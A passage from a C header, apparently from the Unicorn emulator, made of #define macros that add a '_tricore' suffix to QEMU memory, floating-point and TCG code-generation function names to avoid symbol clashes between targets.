memory_region_size_tricore #define memory_region_set_readonly memory_region_set_readonly_tricore #define memory_region_get_ram_ptr memory_region_get_ram_ptr_tricore #define memory_region_from_host memory_region_from_host_tricore #define memory_region_get_ram_addr memory_region_get_ram_addr_tricore #define memory_region_add_subregion memory_region_add_subregion_tricore #define memory_region_del_subregion memory_region_del_subregion_tricore #define memory_region_add_subregion_overlap memory_region_add_subregion_overlap_tricore #define memory_region_find memory_region_find_tricore #define memory_region_filter_subregions memory_region_filter_subregions_tricore #define memory_listener_register memory_listener_register_tricore #define memory_listener_unregister memory_listener_unregister_tricore #define address_space_remove_listeners address_space_remove_listeners_tricore #define address_space_init address_space_init_tricore #define address_space_destroy address_space_destroy_tricore #define memory_region_init_ram memory_region_init_ram_tricore #define memory_mapping_list_add_merge_sorted memory_mapping_list_add_merge_sorted_tricore #define find_memory_mapping find_memory_mapping_tricore #define exec_inline_op exec_inline_op_tricore #define floatx80_default_nan floatx80_default_nan_tricore #define float_raise float_raise_tricore #define float16_is_quiet_nan float16_is_quiet_nan_tricore #define float16_is_signaling_nan float16_is_signaling_nan_tricore #define float32_is_quiet_nan float32_is_quiet_nan_tricore #define float32_is_signaling_nan float32_is_signaling_nan_tricore #define float64_is_quiet_nan float64_is_quiet_nan_tricore #define float64_is_signaling_nan float64_is_signaling_nan_tricore #define floatx80_is_quiet_nan floatx80_is_quiet_nan_tricore #define floatx80_is_signaling_nan floatx80_is_signaling_nan_tricore #define floatx80_silence_nan floatx80_silence_nan_tricore #define propagateFloatx80NaN propagateFloatx80NaN_tricore #define float128_is_quiet_nan float128_is_quiet_nan_tricore #define float128_is_signaling_nan float128_is_signaling_nan_tricore #define float128_silence_nan float128_silence_nan_tricore #define float16_add float16_add_tricore #define float16_sub float16_sub_tricore #define float32_add float32_add_tricore #define float32_sub float32_sub_tricore #define 
float64_add float64_add_tricore #define float64_sub float64_sub_tricore #define float16_mul float16_mul_tricore #define float32_mul float32_mul_tricore #define float64_mul float64_mul_tricore #define float16_muladd float16_muladd_tricore #define float32_muladd float32_muladd_tricore #define float64_muladd float64_muladd_tricore #define float16_div float16_div_tricore #define float32_div float32_div_tricore #define float64_div float64_div_tricore #define float16_to_float32 float16_to_float32_tricore #define float16_to_float64 float16_to_float64_tricore #define float32_to_float16 float32_to_float16_tricore #define float32_to_float64 float32_to_float64_tricore #define float64_to_float16 float64_to_float16_tricore #define float64_to_float32 float64_to_float32_tricore #define float16_round_to_int float16_round_to_int_tricore #define float32_round_to_int float32_round_to_int_tricore #define float64_round_to_int float64_round_to_int_tricore #define float16_to_int16_scalbn float16_to_int16_scalbn_tricore #define float16_to_int32_scalbn float16_to_int32_scalbn_tricore #define float16_to_int64_scalbn float16_to_int64_scalbn_tricore #define float32_to_int16_scalbn float32_to_int16_scalbn_tricore #define float32_to_int32_scalbn float32_to_int32_scalbn_tricore #define float32_to_int64_scalbn float32_to_int64_scalbn_tricore #define float64_to_int16_scalbn float64_to_int16_scalbn_tricore #define float64_to_int32_scalbn float64_to_int32_scalbn_tricore #define float64_to_int64_scalbn float64_to_int64_scalbn_tricore #define float16_to_int16 float16_to_int16_tricore #define float16_to_int32 float16_to_int32_tricore #define float16_to_int64 float16_to_int64_tricore #define float32_to_int16 float32_to_int16_tricore #define float32_to_int32 float32_to_int32_tricore #define float32_to_int64 float32_to_int64_tricore #define float64_to_int16 float64_to_int16_tricore #define float64_to_int32 float64_to_int32_tricore #define float64_to_int64 float64_to_int64_tricore #define float16_to_int16_round_to_zero float16_to_int16_round_to_zero_tricore #define float16_to_int32_round_to_zero float16_to_int32_round_to_zero_tricore #define float16_to_int64_round_to_zero float16_to_int64_round_to_zero_tricore #define float32_to_int16_round_to_zero float32_to_int16_round_to_zero_tricore #define float32_to_int32_round_to_zero float32_to_int32_round_to_zero_tricore #define float32_to_int64_round_to_zero float32_to_int64_round_to_zero_tricore #define float64_to_int16_round_to_zero float64_to_int16_round_to_zero_tricore #define float64_to_int32_round_to_zero float64_to_int32_round_to_zero_tricore #define float64_to_int64_round_to_zero float64_to_int64_round_to_zero_tricore #define float16_to_uint16_scalbn float16_to_uint16_scalbn_tricore #define float16_to_uint32_scalbn float16_to_uint32_scalbn_tricore #define float16_to_uint64_scalbn float16_to_uint64_scalbn_tricore #define float32_to_uint16_scalbn float32_to_uint16_scalbn_tricore #define float32_to_uint32_scalbn float32_to_uint32_scalbn_tricore #define float32_to_uint64_scalbn float32_to_uint64_scalbn_tricore #define float64_to_uint16_scalbn float64_to_uint16_scalbn_tricore #define float64_to_uint32_scalbn float64_to_uint32_scalbn_tricore #define float64_to_uint64_scalbn float64_to_uint64_scalbn_tricore #define float16_to_uint16 float16_to_uint16_tricore #define float16_to_uint32 float16_to_uint32_tricore #define float16_to_uint64 float16_to_uint64_tricore #define float32_to_uint16 float32_to_uint16_tricore #define float32_to_uint32 float32_to_uint32_tricore #define 
float32_to_uint64 float32_to_uint64_tricore #define float64_to_uint16 float64_to_uint16_tricore #define float64_to_uint32 float64_to_uint32_tricore #define float64_to_uint64 float64_to_uint64_tricore #define float16_to_uint16_round_to_zero float16_to_uint16_round_to_zero_tricore #define float16_to_uint32_round_to_zero float16_to_uint32_round_to_zero_tricore #define float16_to_uint64_round_to_zero float16_to_uint64_round_to_zero_tricore #define float32_to_uint16_round_to_zero float32_to_uint16_round_to_zero_tricore #define float32_to_uint32_round_to_zero float32_to_uint32_round_to_zero_tricore #define float32_to_uint64_round_to_zero float32_to_uint64_round_to_zero_tricore #define float64_to_uint16_round_to_zero float64_to_uint16_round_to_zero_tricore #define float64_to_uint32_round_to_zero float64_to_uint32_round_to_zero_tricore #define float64_to_uint64_round_to_zero float64_to_uint64_round_to_zero_tricore #define int64_to_float16_scalbn int64_to_float16_scalbn_tricore #define int32_to_float16_scalbn int32_to_float16_scalbn_tricore #define int16_to_float16_scalbn int16_to_float16_scalbn_tricore #define int64_to_float16 int64_to_float16_tricore #define int32_to_float16 int32_to_float16_tricore #define int16_to_float16 int16_to_float16_tricore #define int64_to_float32_scalbn int64_to_float32_scalbn_tricore #define int32_to_float32_scalbn int32_to_float32_scalbn_tricore #define int16_to_float32_scalbn int16_to_float32_scalbn_tricore #define int64_to_float32 int64_to_float32_tricore #define int32_to_float32 int32_to_float32_tricore #define int16_to_float32 int16_to_float32_tricore #define int64_to_float64_scalbn int64_to_float64_scalbn_tricore #define int32_to_float64_scalbn int32_to_float64_scalbn_tricore #define int16_to_float64_scalbn int16_to_float64_scalbn_tricore #define int64_to_float64 int64_to_float64_tricore #define int32_to_float64 int32_to_float64_tricore #define int16_to_float64 int16_to_float64_tricore #define uint64_to_float16_scalbn uint64_to_float16_scalbn_tricore #define uint32_to_float16_scalbn uint32_to_float16_scalbn_tricore #define uint16_to_float16_scalbn uint16_to_float16_scalbn_tricore #define uint64_to_float16 uint64_to_float16_tricore #define uint32_to_float16 uint32_to_float16_tricore #define uint16_to_float16 uint16_to_float16_tricore #define uint64_to_float32_scalbn uint64_to_float32_scalbn_tricore #define uint32_to_float32_scalbn uint32_to_float32_scalbn_tricore #define uint16_to_float32_scalbn uint16_to_float32_scalbn_tricore #define uint64_to_float32 uint64_to_float32_tricore #define uint32_to_float32 uint32_to_float32_tricore #define uint16_to_float32 uint16_to_float32_tricore #define uint64_to_float64_scalbn uint64_to_float64_scalbn_tricore #define uint32_to_float64_scalbn uint32_to_float64_scalbn_tricore #define uint16_to_float64_scalbn uint16_to_float64_scalbn_tricore #define uint64_to_float64 uint64_to_float64_tricore #define uint32_to_float64 uint32_to_float64_tricore #define uint16_to_float64 uint16_to_float64_tricore #define float16_min float16_min_tricore #define float16_minnum float16_minnum_tricore #define float16_minnummag float16_minnummag_tricore #define float16_max float16_max_tricore #define float16_maxnum float16_maxnum_tricore #define float16_maxnummag float16_maxnummag_tricore #define float32_min float32_min_tricore #define float32_minnum float32_minnum_tricore #define float32_minnummag float32_minnummag_tricore #define float32_max float32_max_tricore #define float32_maxnum float32_maxnum_tricore #define float32_maxnummag 
float32_maxnummag_tricore #define float64_min float64_min_tricore #define float64_minnum float64_minnum_tricore #define float64_minnummag float64_minnummag_tricore #define float64_max float64_max_tricore #define float64_maxnum float64_maxnum_tricore #define float64_maxnummag float64_maxnummag_tricore #define float16_compare float16_compare_tricore #define float16_compare_quiet float16_compare_quiet_tricore #define float32_compare float32_compare_tricore #define float32_compare_quiet float32_compare_quiet_tricore #define float64_compare float64_compare_tricore #define float64_compare_quiet float64_compare_quiet_tricore #define float16_scalbn float16_scalbn_tricore #define float32_scalbn float32_scalbn_tricore #define float64_scalbn float64_scalbn_tricore #define float16_sqrt float16_sqrt_tricore #define float32_sqrt float32_sqrt_tricore #define float64_sqrt float64_sqrt_tricore #define float16_default_nan float16_default_nan_tricore #define float32_default_nan float32_default_nan_tricore #define float64_default_nan float64_default_nan_tricore #define float128_default_nan float128_default_nan_tricore #define float16_silence_nan float16_silence_nan_tricore #define float32_silence_nan float32_silence_nan_tricore #define float64_silence_nan float64_silence_nan_tricore #define float16_squash_input_denormal float16_squash_input_denormal_tricore #define float32_squash_input_denormal float32_squash_input_denormal_tricore #define float64_squash_input_denormal float64_squash_input_denormal_tricore #define normalizeFloatx80Subnormal normalizeFloatx80Subnormal_tricore #define roundAndPackFloatx80 roundAndPackFloatx80_tricore #define normalizeRoundAndPackFloatx80 normalizeRoundAndPackFloatx80_tricore #define int32_to_floatx80 int32_to_floatx80_tricore #define int32_to_float128 int32_to_float128_tricore #define int64_to_floatx80 int64_to_floatx80_tricore #define int64_to_float128 int64_to_float128_tricore #define uint64_to_float128 uint64_to_float128_tricore #define float32_to_floatx80 float32_to_floatx80_tricore #define float32_to_float128 float32_to_float128_tricore #define float32_rem float32_rem_tricore #define float32_exp2 float32_exp2_tricore #define float32_log2 float32_log2_tricore #define float32_eq float32_eq_tricore #define float32_le float32_le_tricore #define float32_lt float32_lt_tricore #define float32_unordered float32_unordered_tricore #define float32_eq_quiet float32_eq_quiet_tricore #define float32_le_quiet float32_le_quiet_tricore #define float32_lt_quiet float32_lt_quiet_tricore #define float32_unordered_quiet float32_unordered_quiet_tricore #define float64_to_floatx80 float64_to_floatx80_tricore #define float64_to_float128 float64_to_float128_tricore #define float64_rem float64_rem_tricore #define float64_log2 float64_log2_tricore #define float64_eq float64_eq_tricore #define float64_le float64_le_tricore #define float64_lt float64_lt_tricore #define float64_unordered float64_unordered_tricore #define float64_eq_quiet float64_eq_quiet_tricore #define float64_le_quiet float64_le_quiet_tricore #define float64_lt_quiet float64_lt_quiet_tricore #define float64_unordered_quiet float64_unordered_quiet_tricore #define floatx80_to_int32 floatx80_to_int32_tricore #define floatx80_to_int32_round_to_zero floatx80_to_int32_round_to_zero_tricore #define floatx80_to_int64 floatx80_to_int64_tricore #define floatx80_to_int64_round_to_zero floatx80_to_int64_round_to_zero_tricore #define floatx80_to_float32 floatx80_to_float32_tricore #define floatx80_to_float64 floatx80_to_float64_tricore #define 
floatx80_to_float128 floatx80_to_float128_tricore #define floatx80_round floatx80_round_tricore #define floatx80_round_to_int floatx80_round_to_int_tricore #define floatx80_add floatx80_add_tricore #define floatx80_sub floatx80_sub_tricore #define floatx80_mul floatx80_mul_tricore #define floatx80_div floatx80_div_tricore #define floatx80_rem floatx80_rem_tricore #define floatx80_sqrt floatx80_sqrt_tricore #define floatx80_eq floatx80_eq_tricore #define floatx80_le floatx80_le_tricore #define floatx80_lt floatx80_lt_tricore #define floatx80_unordered floatx80_unordered_tricore #define floatx80_eq_quiet floatx80_eq_quiet_tricore #define floatx80_le_quiet floatx80_le_quiet_tricore #define floatx80_lt_quiet floatx80_lt_quiet_tricore #define floatx80_unordered_quiet floatx80_unordered_quiet_tricore #define float128_to_int32 float128_to_int32_tricore #define float128_to_int32_round_to_zero float128_to_int32_round_to_zero_tricore #define float128_to_int64 float128_to_int64_tricore #define float128_to_int64_round_to_zero float128_to_int64_round_to_zero_tricore #define float128_to_uint64 float128_to_uint64_tricore #define float128_to_uint64_round_to_zero float128_to_uint64_round_to_zero_tricore #define float128_to_uint32_round_to_zero float128_to_uint32_round_to_zero_tricore #define float128_to_uint32 float128_to_uint32_tricore #define float128_to_float32 float128_to_float32_tricore #define float128_to_float64 float128_to_float64_tricore #define float128_to_floatx80 float128_to_floatx80_tricore #define float128_round_to_int float128_round_to_int_tricore #define float128_add float128_add_tricore #define float128_sub float128_sub_tricore #define float128_mul float128_mul_tricore #define float128_div float128_div_tricore #define float128_rem float128_rem_tricore #define float128_sqrt float128_sqrt_tricore #define float128_eq float128_eq_tricore #define float128_le float128_le_tricore #define float128_lt float128_lt_tricore #define float128_unordered float128_unordered_tricore #define float128_eq_quiet float128_eq_quiet_tricore #define float128_le_quiet float128_le_quiet_tricore #define float128_lt_quiet float128_lt_quiet_tricore #define float128_unordered_quiet float128_unordered_quiet_tricore #define floatx80_compare floatx80_compare_tricore #define floatx80_compare_quiet floatx80_compare_quiet_tricore #define float128_compare float128_compare_tricore #define float128_compare_quiet float128_compare_quiet_tricore #define floatx80_scalbn floatx80_scalbn_tricore #define float128_scalbn float128_scalbn_tricore #define softfloat_init softfloat_init_tricore #define tcg_optimize tcg_optimize_tricore #define gen_new_label gen_new_label_tricore #define tcg_can_emit_vec_op tcg_can_emit_vec_op_tricore #define tcg_expand_vec_op tcg_expand_vec_op_tricore #define tcg_register_jit tcg_register_jit_tricore #define tcg_tb_insert tcg_tb_insert_tricore #define tcg_tb_remove tcg_tb_remove_tricore #define tcg_tb_lookup tcg_tb_lookup_tricore #define tcg_tb_foreach tcg_tb_foreach_tricore #define tcg_nb_tbs tcg_nb_tbs_tricore #define tcg_region_reset_all tcg_region_reset_all_tricore #define tcg_region_init tcg_region_init_tricore #define tcg_code_size tcg_code_size_tricore #define tcg_code_capacity tcg_code_capacity_tricore #define tcg_tb_phys_invalidate_count tcg_tb_phys_invalidate_count_tricore #define tcg_malloc_internal tcg_malloc_internal_tricore #define tcg_pool_reset tcg_pool_reset_tricore #define tcg_context_init tcg_context_init_tricore #define tcg_tb_alloc tcg_tb_alloc_tricore #define tcg_prologue_init 
tcg_prologue_init_tricore #define tcg_func_start tcg_func_start_tricore #define tcg_set_frame tcg_set_frame_tricore #define tcg_global_mem_new_internal tcg_global_mem_new_internal_tricore #define tcg_temp_new_internal tcg_temp_new_internal_tricore #define tcg_temp_new_vec tcg_temp_new_vec_tricore #define tcg_temp_new_vec_matching tcg_temp_new_vec_matching_tricore #define tcg_temp_free_internal tcg_temp_free_internal_tricore #define tcg_const_i32 tcg_const_i32_tricore #define tcg_const_i64 tcg_const_i64_tricore #define tcg_const_local_i32 tcg_const_local_i32_tricore #define tcg_const_local_i64 tcg_const_local_i64_tricore #define tcg_op_supported tcg_op_supported_tricore #define tcg_gen_callN tcg_gen_callN_tricore #define tcg_op_remove tcg_op_remove_tricore #define tcg_emit_op tcg_emit_op_tricore #define tcg_op_insert_before tcg_op_insert_before_tricore #define tcg_op_insert_after tcg_op_insert_after_tricore #define tcg_cpu_exec_time tcg_cpu_exec_time_tricore #define tcg_gen_code tcg_gen_code_tricore #define tcg_gen_op1 tcg_gen_op1_tricore #define tcg_gen_op2 tcg_gen_op2_tricore #define tcg_gen_op3 tcg_gen_op3_tricore #define tcg_gen_op4 tcg_gen_op4_tricore #define tcg_gen_op5 tcg_gen_op5_tricore #define tcg_gen_op6 tcg_gen_op6_tricore #define tcg_gen_mb tcg_gen_mb_tricore #define tcg_gen_addi_i32 tcg_gen_addi_i32_tricore #define tcg_gen_subfi_i32 tcg_gen_subfi_i32_tricore #define tcg_gen_subi_i32 tcg_gen_subi_i32_tricore #define tcg_gen_andi_i32 tcg_gen_andi_i32_tricore #define tcg_gen_ori_i32 tcg_gen_ori_i32_tricore #define tcg_gen_xori_i32 tcg_gen_xori_i32_tricore #define tcg_gen_shli_i32 tcg_gen_shli_i32_tricore #define tcg_gen_shri_i32 tcg_gen_shri_i32_tricore #define tcg_gen_sari_i32 tcg_gen_sari_i32_tricore #define tcg_gen_brcond_i32 tcg_gen_brcond_i32_tricore #define tcg_gen_brcondi_i32 tcg_gen_brcondi_i32_tricore #define tcg_gen_setcond_i32 tcg_gen_setcond_i32_tricore #define tcg_gen_setcondi_i32 tcg_gen_setcondi_i32_tricore #define tcg_gen_muli_i32 tcg_gen_muli_i32_tricore #define tcg_gen_div_i32 tcg_gen_div_i32_tricore #define tcg_gen_rem_i32 tcg_gen_rem_i32_tricore #define tcg_gen_divu_i32 tcg_gen_divu_i32_tricore #define tcg_gen_remu_i32 tcg_gen_remu_i32_tricore #define tcg_gen_andc_i32 tcg_gen_andc_i32_tricore #define tcg_gen_eqv_i32 tcg_gen_eqv_i32_tricore #define tcg_gen_nand_i32 tcg_gen_nand_i32_tricore #define tcg_gen_nor_i32 tcg_gen_nor_i32_tricore #define tcg_gen_orc_i32 tcg_gen_orc_i32_tricore #define tcg_gen_clz_i32 tcg_gen_clz_i32_tricore #define tcg_gen_clzi_i32 tcg_gen_clzi_i32_tricore #define tcg_gen_ctz_i32 tcg_gen_ctz_i32_tricore #define tcg_gen_ctzi_i32 tcg_gen_ctzi_i32_tricore #define tcg_gen_clrsb_i32 tcg_gen_clrsb_i32_tricore #define tcg_gen_ctpop_i32 tcg_gen_ctpop_i32_tricore #define tcg_gen_rotl_i32 tcg_gen_rotl_i32_tricore #define tcg_gen_rotli_i32 tcg_gen_rotli_i32_tricore #define tcg_gen_rotr_i32 tcg_gen_rotr_i32_tricore #define tcg_gen_rotri_i32 tcg_gen_rotri_i32_tricore #define tcg_gen_deposit_i32 tcg_gen_deposit_i32_tricore #define tcg_gen_deposit_z_i32 tcg_gen_deposit_z_i32_tricore #define tcg_gen_extract_i32 tcg_gen_extract_i32_tricore #define tcg_gen_sextract_i32 tcg_gen_sextract_i32_tricore #define tcg_gen_extract2_i32 tcg_gen_extract2_i32_tricore #define tcg_gen_movcond_i32 tcg_gen_movcond_i32_tricore #define tcg_gen_add2_i32 tcg_gen_add2_i32_tricore #define tcg_gen_sub2_i32 tcg_gen_sub2_i32_tricore #define tcg_gen_mulu2_i32 tcg_gen_mulu2_i32_tricore #define tcg_gen_muls2_i32 tcg_gen_muls2_i32_tricore #define tcg_gen_mulsu2_i32 
tcg_gen_mulsu2_i32_tricore #define tcg_gen_ext8s_i32 tcg_gen_ext8s_i32_tricore #define tcg_gen_ext16s_i32 tcg_gen_ext16s_i32_tricore #define tcg_gen_ext8u_i32 tcg_gen_ext8u_i32_tricore #define tcg_gen_ext16u_i32 tcg_gen_ext16u_i32_tricore #define tcg_gen_bswap16_i32 tcg_gen_bswap16_i32_tricore #define tcg_gen_bswap32_i32 tcg_gen_bswap32_i32_tricore #define tcg_gen_smin_i32 tcg_gen_smin_i32_tricore #define tcg_gen_umin_i32 tcg_gen_umin_i32_tricore #define tcg_gen_smax_i32 tcg_gen_smax_i32_tricore #define tcg_gen_umax_i32 tcg_gen_umax_i32_tricore #define tcg_gen_abs_i32 tcg_gen_abs_i32_tricore #define tcg_gen_addi_i64 tcg_gen_addi_i64_tricore #define tcg_gen_subfi_i64 tcg_gen_subfi_i64_tricore #define tcg_gen_subi_i64 tcg_gen_subi_i64_tricore #define tcg_gen_andi_i64 tcg_gen_andi_i64_tricore #define tcg_gen_ori_i64 tcg_gen_ori_i64_tricore #define tcg_gen_xori_i64 tcg_gen_xori_i64_tricore #define tcg_gen_shli_i64 tcg_gen_shli_i64_tricore #define tcg_gen_shri_i64 tcg_gen_shri_i64_tricore #define tcg_gen_sari_i64 tcg_gen_sari_i64_tricore #define tcg_gen_brcond_i64 tcg_gen_brcond_i64_tricore #define tcg_gen_brcondi_i64 tcg_gen_brcondi_i64_tricore #define tcg_gen_setcond_i64 tcg_gen_setcond_i64_tricore #define tcg_gen_setcondi_i64 tcg_gen_setcondi_i64_tricore #define tcg_gen_muli_i64 tcg_gen_muli_i64_tricore #define tcg_gen_div_i64 tcg_gen_div_i64_tricore #define tcg_gen_rem_i64 tcg_gen_rem_i64_tricore #define tcg_gen_divu_i64 tcg_gen_divu_i64_tricore #define tcg_gen_remu_i64 tcg_gen_remu_i64_tricore #define tcg_gen_ext8s_i64 tcg_gen_ext8s_i64_tricore #define tcg_gen_ext16s_i64 tcg_gen_ext16s_i64_tricore #define tcg_gen_ext32s_i64 tcg_gen_ext32s_i64_tricore #define tcg_gen_ext8u_i64 tcg_gen_ext8u_i64_tricore #define tcg_gen_ext16u_i64 tcg_gen_ext16u_i64_tricore #define tcg_gen_ext32u_i64 tcg_gen_ext32u_i64_tricore #define tcg_gen_bswap16_i64 tcg_gen_bswap16_i64_tricore #define tcg_gen_bswap32_i64 tcg_gen_bswap32_i64_tricore #define tcg_gen_bswap64_i64 tcg_gen_bswap64_i64_tricore #define tcg_gen_not_i64 tcg_gen_not_i64_tricore #define tcg_gen_andc_i64 tcg_gen_andc_i64_tricore #define tcg_gen_eqv_i64 tcg_gen_eqv_i64_tricore #define tcg_gen_nand_i64 tcg_gen_nand_i64_tricore #define tcg_gen_nor_i64 tcg_gen_nor_i64_tricore #define tcg_gen_orc_i64 tcg_gen_orc_i64_tricore #define tcg_gen_clz_i64 tcg_gen_clz_i64_tricore #define tcg_gen_clzi_i64 tcg_gen_clzi_i64_tricore #define tcg_gen_ctz_i64 tcg_gen_ctz_i64_tricore #define tcg_gen_ctzi_i64 tcg_gen_ctzi_i64_tricore #define tcg_gen_clrsb_i64 tcg_gen_clrsb_i64_tricore #define tcg_gen_ctpop_i64 tcg_gen_ctpop_i64_tricore #define tcg_gen_rotl_i64 tcg_gen_rotl_i64_tricore #define tcg_gen_rotli_i64 tcg_gen_rotli_i64_tricore #define tcg_gen_rotr_i64 tcg_gen_rotr_i64_tricore #define tcg_gen_rotri_i64 tcg_gen_rotri_i64_tricore #define tcg_gen_deposit_i64 tcg_gen_deposit_i64_tricore #define tcg_gen_deposit_z_i64 tcg_gen_deposit_z_i64_tricore #define tcg_gen_extract_i64 tcg_gen_extract_i64_tricore #define tcg_gen_sextract_i64 tcg_gen_sextract_i64_tricore #define tcg_gen_extract2_i64 tcg_gen_extract2_i64_tricore #define tcg_gen_movcond_i64 tcg_gen_movcond_i64_tricore #define tcg_gen_add2_i64 tcg_gen_add2_i64_tricore #define tcg_gen_sub2_i64 tcg_gen_sub2_i64_tricore #define tcg_gen_mulu2_i64 tcg_gen_mulu2_i64_tricore #define tcg_gen_muls2_i64 tcg_gen_muls2_i64_tricore #define tcg_gen_mulsu2_i64 tcg_gen_mulsu2_i64_tricore #define tcg_gen_smin_i64 tcg_gen_smin_i64_tricore #define tcg_gen_umin_i64 tcg_gen_umin_i64_tricore #define tcg_gen_smax_i64 tcg_gen_smax_i64_tricore 
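/*
 * Editorial note (not generated output): every rename in this header
 * appends the architecture postfix so that multiple QEMU targets can be
 * linked into a single libunicorn without symbol collisions, e.g.:
 *
 *     #define reg_read reg_read_tricore
 *     // any definition or call of reg_read() now resolves to
 *     // reg_read_tricore() at compile time
 *
 * Sibling headers (one per target) repeat the same list with their own
 * UNICORN_ARCH_POSTFIX.
 */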
#define tcg_gen_umax_i64 tcg_gen_umax_i64_tricore #define tcg_gen_abs_i64 tcg_gen_abs_i64_tricore #define tcg_gen_extrl_i64_i32 tcg_gen_extrl_i64_i32_tricore #define tcg_gen_extrh_i64_i32 tcg_gen_extrh_i64_i32_tricore #define tcg_gen_extu_i32_i64 tcg_gen_extu_i32_i64_tricore #define tcg_gen_ext_i32_i64 tcg_gen_ext_i32_i64_tricore #define tcg_gen_concat_i32_i64 tcg_gen_concat_i32_i64_tricore #define tcg_gen_extr_i64_i32 tcg_gen_extr_i64_i32_tricore #define tcg_gen_extr32_i64 tcg_gen_extr32_i64_tricore #define tcg_gen_exit_tb tcg_gen_exit_tb_tricore #define tcg_gen_goto_tb tcg_gen_goto_tb_tricore #define tcg_gen_lookup_and_goto_ptr tcg_gen_lookup_and_goto_ptr_tricore #define check_exit_request check_exit_request_tricore #define tcg_gen_qemu_ld_i32 tcg_gen_qemu_ld_i32_tricore #define tcg_gen_qemu_st_i32 tcg_gen_qemu_st_i32_tricore #define tcg_gen_qemu_ld_i64 tcg_gen_qemu_ld_i64_tricore #define tcg_gen_qemu_st_i64 tcg_gen_qemu_st_i64_tricore #define tcg_gen_atomic_cmpxchg_i32 tcg_gen_atomic_cmpxchg_i32_tricore #define tcg_gen_atomic_cmpxchg_i64 tcg_gen_atomic_cmpxchg_i64_tricore #define tcg_gen_atomic_fetch_add_i32 tcg_gen_atomic_fetch_add_i32_tricore #define tcg_gen_atomic_fetch_add_i64 tcg_gen_atomic_fetch_add_i64_tricore #define tcg_gen_atomic_fetch_and_i32 tcg_gen_atomic_fetch_and_i32_tricore #define tcg_gen_atomic_fetch_and_i64 tcg_gen_atomic_fetch_and_i64_tricore #define tcg_gen_atomic_fetch_or_i32 tcg_gen_atomic_fetch_or_i32_tricore #define tcg_gen_atomic_fetch_or_i64 tcg_gen_atomic_fetch_or_i64_tricore #define tcg_gen_atomic_fetch_xor_i32 tcg_gen_atomic_fetch_xor_i32_tricore #define tcg_gen_atomic_fetch_xor_i64 tcg_gen_atomic_fetch_xor_i64_tricore #define tcg_gen_atomic_fetch_smin_i32 tcg_gen_atomic_fetch_smin_i32_tricore #define tcg_gen_atomic_fetch_smin_i64 tcg_gen_atomic_fetch_smin_i64_tricore #define tcg_gen_atomic_fetch_umin_i32 tcg_gen_atomic_fetch_umin_i32_tricore #define tcg_gen_atomic_fetch_umin_i64 tcg_gen_atomic_fetch_umin_i64_tricore #define tcg_gen_atomic_fetch_smax_i32 tcg_gen_atomic_fetch_smax_i32_tricore #define tcg_gen_atomic_fetch_smax_i64 tcg_gen_atomic_fetch_smax_i64_tricore #define tcg_gen_atomic_fetch_umax_i32 tcg_gen_atomic_fetch_umax_i32_tricore #define tcg_gen_atomic_fetch_umax_i64 tcg_gen_atomic_fetch_umax_i64_tricore #define tcg_gen_atomic_add_fetch_i32 tcg_gen_atomic_add_fetch_i32_tricore #define tcg_gen_atomic_add_fetch_i64 tcg_gen_atomic_add_fetch_i64_tricore #define tcg_gen_atomic_and_fetch_i32 tcg_gen_atomic_and_fetch_i32_tricore #define tcg_gen_atomic_and_fetch_i64 tcg_gen_atomic_and_fetch_i64_tricore #define tcg_gen_atomic_or_fetch_i32 tcg_gen_atomic_or_fetch_i32_tricore #define tcg_gen_atomic_or_fetch_i64 tcg_gen_atomic_or_fetch_i64_tricore #define tcg_gen_atomic_xor_fetch_i32 tcg_gen_atomic_xor_fetch_i32_tricore #define tcg_gen_atomic_xor_fetch_i64 tcg_gen_atomic_xor_fetch_i64_tricore #define tcg_gen_atomic_smin_fetch_i32 tcg_gen_atomic_smin_fetch_i32_tricore #define tcg_gen_atomic_smin_fetch_i64 tcg_gen_atomic_smin_fetch_i64_tricore #define tcg_gen_atomic_umin_fetch_i32 tcg_gen_atomic_umin_fetch_i32_tricore #define tcg_gen_atomic_umin_fetch_i64 tcg_gen_atomic_umin_fetch_i64_tricore #define tcg_gen_atomic_smax_fetch_i32 tcg_gen_atomic_smax_fetch_i32_tricore #define tcg_gen_atomic_smax_fetch_i64 tcg_gen_atomic_smax_fetch_i64_tricore #define tcg_gen_atomic_umax_fetch_i32 tcg_gen_atomic_umax_fetch_i32_tricore #define tcg_gen_atomic_umax_fetch_i64 tcg_gen_atomic_umax_fetch_i64_tricore #define tcg_gen_atomic_xchg_i32 tcg_gen_atomic_xchg_i32_tricore 
#define tcg_gen_atomic_xchg_i64 tcg_gen_atomic_xchg_i64_tricore #define simd_desc simd_desc_tricore #define tcg_gen_gvec_2_ool tcg_gen_gvec_2_ool_tricore #define tcg_gen_gvec_2i_ool tcg_gen_gvec_2i_ool_tricore #define tcg_gen_gvec_3_ool tcg_gen_gvec_3_ool_tricore #define tcg_gen_gvec_4_ool tcg_gen_gvec_4_ool_tricore #define tcg_gen_gvec_5_ool tcg_gen_gvec_5_ool_tricore #define tcg_gen_gvec_2_ptr tcg_gen_gvec_2_ptr_tricore #define tcg_gen_gvec_3_ptr tcg_gen_gvec_3_ptr_tricore #define tcg_gen_gvec_4_ptr tcg_gen_gvec_4_ptr_tricore #define tcg_gen_gvec_5_ptr tcg_gen_gvec_5_ptr_tricore #define tcg_gen_gvec_2 tcg_gen_gvec_2_tricore #define tcg_gen_gvec_2i tcg_gen_gvec_2i_tricore #define tcg_gen_gvec_2s tcg_gen_gvec_2s_tricore #define tcg_gen_gvec_3 tcg_gen_gvec_3_tricore #define tcg_gen_gvec_3i tcg_gen_gvec_3i_tricore #define tcg_gen_gvec_4 tcg_gen_gvec_4_tricore #define tcg_gen_gvec_mov tcg_gen_gvec_mov_tricore #define tcg_gen_gvec_dup_i32 tcg_gen_gvec_dup_i32_tricore #define tcg_gen_gvec_dup_i64 tcg_gen_gvec_dup_i64_tricore #define tcg_gen_gvec_dup_mem tcg_gen_gvec_dup_mem_tricore #define tcg_gen_gvec_dup64i tcg_gen_gvec_dup64i_tricore #define tcg_gen_gvec_dup32i tcg_gen_gvec_dup32i_tricore #define tcg_gen_gvec_dup16i tcg_gen_gvec_dup16i_tricore #define tcg_gen_gvec_dup8i tcg_gen_gvec_dup8i_tricore #define tcg_gen_gvec_not tcg_gen_gvec_not_tricore #define tcg_gen_vec_add8_i64 tcg_gen_vec_add8_i64_tricore #define tcg_gen_vec_add16_i64 tcg_gen_vec_add16_i64_tricore #define tcg_gen_vec_add32_i64 tcg_gen_vec_add32_i64_tricore #define tcg_gen_gvec_add tcg_gen_gvec_add_tricore #define tcg_gen_gvec_adds tcg_gen_gvec_adds_tricore #define tcg_gen_gvec_addi tcg_gen_gvec_addi_tricore #define tcg_gen_gvec_subs tcg_gen_gvec_subs_tricore #define 